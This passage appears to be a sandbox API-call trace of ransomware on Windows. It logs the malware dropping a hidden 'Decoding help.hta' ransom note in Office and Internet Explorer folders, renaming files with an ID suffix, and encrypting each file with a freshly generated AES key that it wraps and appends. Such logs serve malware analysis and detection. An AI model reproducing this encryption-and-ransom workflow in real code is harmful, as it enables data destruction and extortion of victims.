FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0xca4fd30 | out: lpFindFileData=0xca4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4e33900, ftCreationTime.dwHighDateTime=0x1cab7ec, ftLastAccessTime.dwLowDateTime=0x50ff7a90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa4e33900, ftLastWriteTime.dwHighDateTime=0x1cab7ec, nFileSizeHigh=0x0, nFileSizeLow=0x1313b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACCDDS.DLL", cAlternateFileName="")) returned 1 [0041.940] lstrcpyW (in: lpString1=0x98aa858, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" [0041.940] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned 50 [0041.940] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Decoding help.hta" [0041.940] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\office14\\decoding help.hta")) returned 0xffffffff [0041.940] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\office14\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x498 [0041.941] WriteFile (in: hFile=0x498, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xca4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xca4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.942] CloseHandle (hObject=0x498) returned 1 [0041.942] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.942] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ACCDDS.DLL") returned 1 [0041.942] lstrlenW (lpString="ACCDDS.DLL") returned 10 [0041.943] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" [0041.943] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned 50 [0041.943] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\", lpString2="ACCDDS.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL" [0041.943] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL" [0041.943] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0041.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accdds.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\office14\\accdds.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.943] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\office14\\accdds.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x498 [0041.944] CreateFileMappingA (hFile=0x498, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x49c [0041.944] CryptAcquireContextA (in: phProv=0xca4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xca4fcec*=0x3449f90) returned 1 [0045.114] CryptGenKey (in: hProv=0x3449f90, Algid=0x6610, dwFlags=0x1, phKey=0xca4fce8 | out: phKey=0xca4fce8*=0x5d7d90) returned 1 [0045.114] CryptExportKey (in: hKey=0x5d7d90, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xca4fbe4, pdwDataLen=0xca4fce4 | out: pbData=0xca4fbe4*, pdwDataLen=0xca4fce4*=0x2c) returned 1 [0045.114] MapViewOfFile (hFileMappingObject=0x49c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x19120000 [0045.128] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xca4fbe4*, pdwDataLen=0xca4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xca4fbe4*, pdwDataLen=0xca4fcf8*=0x100) returned 1 [0045.128] CryptEncrypt (in: hKey=0x5d7d90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x19120000, pdwDataLen=0xca4fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x19120000*, pdwDataLen=0xca4fce4*=0x100000) returned 1 [0045.785] UnmapViewOfFile (lpBaseAddress=0x19120000) returned 1 [0045.796] CloseHandle (hObject=0x49c) returned 1 [0045.796] CryptDestroyKey (hKey=0x5d7d90) returned 1 [0045.796] CryptReleaseContext (hProv=0x3449f90, dwFlags=0x0) returned 1 [0045.796] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0045.796] WriteFile (in: hFile=0x498, lpBuffer=0xca4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xca4fcf8, lpOverlapped=0x0 | out: lpBuffer=0xca4fbe4*, lpNumberOfBytesWritten=0xca4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0045.805] WriteFile (in: hFile=0x498, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xca4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xca4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0045.805] CloseHandle (hObject=0x498) returned 1 [0047.893] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDS.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0050.373] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0xca4fd30 | out: lpFindFileData=0xca4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4e33900, ftCreationTime.dwHighDateTime=0x1cab7ec, ftLastAccessTime.dwLowDateTime=0x5e8e0f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa4e33900, ftLastWriteTime.dwHighDateTime=0x1cab7ec, nFileSizeHigh=0x0, nFileSizeLow=0x8d7a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACCDDSF.DLL", cAlternateFileName="")) returned 1 [0050.373] lstrcpyW (in: lpString1=0x25197a78, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" [0050.373] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned 50 [0050.373] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Decoding help.hta" [0050.373] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\office14\\decoding help.hta")) returned 0x1 [0050.373] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ACCDDSF.DLL") returned 1 [0050.373] lstrlenW (lpString="ACCDDSF.DLL") returned 11 [0050.373] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" [0050.373] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned 50 [0050.373] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\", lpString2="ACCDDSF.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL" [0050.373] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL" [0050.373] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0050.373] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accddsf.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\office14\\accddsf.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0055.287] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\office14\\accddsf.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x748 [0055.288] CreateFileMappingA (hFile=0x748, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0055.288] CryptAcquireContextA (in: phProv=0xca4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xca4fcec*=0x344a348) returned 1 [0059.626] CryptGenKey (in: hProv=0x344a348, Algid=0x6610, dwFlags=0x1, phKey=0xca4fce8 | out: phKey=0xca4fce8*=0x5d8690) returned 1 [0059.626] CryptExportKey (in: hKey=0x5d8690, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xca4fbe4, pdwDataLen=0xca4fce4 | out: pbData=0xca4fbe4*, pdwDataLen=0xca4fce4*=0x2c) returned 1 [0059.626] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8d7a0) returned 0x30ef0000 [0059.632] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xca4fbe4*, pdwDataLen=0xca4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xca4fbe4*, pdwDataLen=0xca4fcf8*=0x100) returned 1 [0059.632] CryptEncrypt (in: hKey=0x5d8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x30ef0000, pdwDataLen=0xca4fce4*=0x8d7a0, dwBufLen=0x8d7a0 | out: pbData=0x30ef0000*, pdwDataLen=0xca4fce4*=0x8d7a0) returned 1 [0059.732] UnmapViewOfFile (lpBaseAddress=0x30ef0000) returned 1 [0059.740] CloseHandle (hObject=0x28c) returned 1 [0059.740] CryptDestroyKey (hKey=0x5d8690) returned 1 [0059.740] CryptReleaseContext (hProv=0x344a348, dwFlags=0x0) returned 1 [0059.741] SetFilePointerEx (in: hFile=0x748, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.741] WriteFile (in: hFile=0x748, lpBuffer=0xca4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xca4fcf8, lpOverlapped=0x0 | out: lpBuffer=0xca4fbe4*, lpNumberOfBytesWritten=0xca4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.266] WriteFile (in: hFile=0x748, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xca4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xca4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.266] CloseHandle (hObject=0x748) returned 1 [0061.266] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.266] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0xca4fd30 | out: lpFindFileData=0xca4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4e33900, ftCreationTime.dwHighDateTime=0x1cab7ec, ftLastAccessTime.dwLowDateTime=0x5e8e0f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa4e33900, ftLastWriteTime.dwHighDateTime=0x1cab7ec, nFileSizeHigh=0x0, nFileSizeLow=0x86db0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACCDDSLM.DLL", cAlternateFileName="")) returned 1 [0061.267] lstrcpyW (in: lpString1=0x3402328, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" [0061.267] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned 50 [0061.267] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Decoding help.hta" [0061.267] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\office14\\decoding help.hta")) returned 0x1 [0061.267] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ACCDDSLM.DLL") returned 1 [0061.267] lstrlenW (lpString="ACCDDSLM.DLL") returned 12 [0061.267] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" [0061.267] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned 50 [0061.267] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\", lpString2="ACCDDSLM.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL" [0061.267] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL" [0061.267] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0061.267] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accddslm.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\office14\\accddslm.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.269] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\office14\\accddslm.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x748 [0061.269] CreateFileMappingA (hFile=0x748, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xabc [0061.269] CryptAcquireContextA (phProv=0xca4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 154 os_tid = 0x908 [0040.240] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\*.*", lpFindFileData=0xcb8fd30 | out: lpFindFileData=0xcb8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9bb8508b, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9bb8508b, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0040.240] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.240] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0xcb8fd30 | out: lpFindFileData=0xcb8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9bb8508b, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9bb8508b, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.240] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.240] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.240] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0xcb8fd30 | out: lpFindFileData=0xcb8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81351db4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf227ca87, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf22a2be7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="install.ins", cAlternateFileName="")) returned 1 [0040.241] lstrcpyW (in: lpString1=0x42b0868, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\*.*" [0040.241] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\*.*") returned 55 [0040.241] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\Decoding help.hta" [0040.241] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\signup\\decoding help.hta")) returned 0xffffffff [0040.241] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\signup\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0040.763] WriteFile (in: hFile=0x314, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xcb8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xcb8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.764] CloseHandle (hObject=0x314) returned 1 [0040.764] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.134] lstrcmpiW (lpString1="Decoding help.hta", lpString2="install.ins") returned -1 [0041.134] lstrlenW (lpString="install.ins") returned 11 [0041.134] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\*.*" [0041.134] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\*.*") returned 55 [0041.134] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\", lpString2="install.ins" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins" [0041.134] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins" [0041.134] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins.[ID]g9uZrLhJaygpwRm1[ID]" [0041.134] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files (x86)\\internet explorer\\signup\\install.ins"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\signup\\install.ins.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.135] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\signup\\install.ins.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0041.135] CreateFileMappingA (hFile=0x230, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x35c [0041.135] CryptAcquireContextA (in: phProv=0xcb8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcb8fcec*=0x34490b0) returned 1 [0043.514] CryptGenKey (in: hProv=0x34490b0, Algid=0x6610, dwFlags=0x1, phKey=0xcb8fce8 | out: phKey=0xcb8fce8*=0x5a58b0) returned 1 [0043.514] CryptExportKey (in: hKey=0x5a58b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xcb8fbe4, pdwDataLen=0xcb8fce4 | out: pbData=0xcb8fbe4*, pdwDataLen=0xcb8fce4*=0x2c) returned 1 [0043.514] MapViewOfFile (hFileMappingObject=0x35c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1c0) returned 0x44a0000 [0043.517] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xcb8fbe4*, pdwDataLen=0xcb8fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xcb8fbe4*, pdwDataLen=0xcb8fcf8*=0x100) returned 1 [0043.517] CryptEncrypt (in: hKey=0x5a58b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44a0000*, pdwDataLen=0xcb8fce4*=0x1c0, dwBufLen=0x1c0 | out: pbData=0x44a0000*, pdwDataLen=0xcb8fce4*=0x1c0) returned 1 [0043.517] UnmapViewOfFile (lpBaseAddress=0x44a0000) returned 1 [0043.518] CloseHandle (hObject=0x35c) returned 1 [0043.518] CryptDestroyKey (hKey=0x5a58b0) returned 1 [0043.518] CryptReleaseContext (hProv=0x34490b0, dwFlags=0x0) returned 1 [0043.518] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.518] WriteFile (in: hFile=0x230, lpBuffer=0xcb8fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xcb8fcf8, lpOverlapped=0x0 | out: lpBuffer=0xcb8fbe4*, lpNumberOfBytesWritten=0xcb8fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.519] WriteFile (in: hFile=0x230, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xcb8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xcb8fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.519] CloseHandle (hObject=0x230) returned 1 [0043.520] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.520] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0xcb8fd30 | out: lpFindFileData=0xcb8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81351db4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf227ca87, 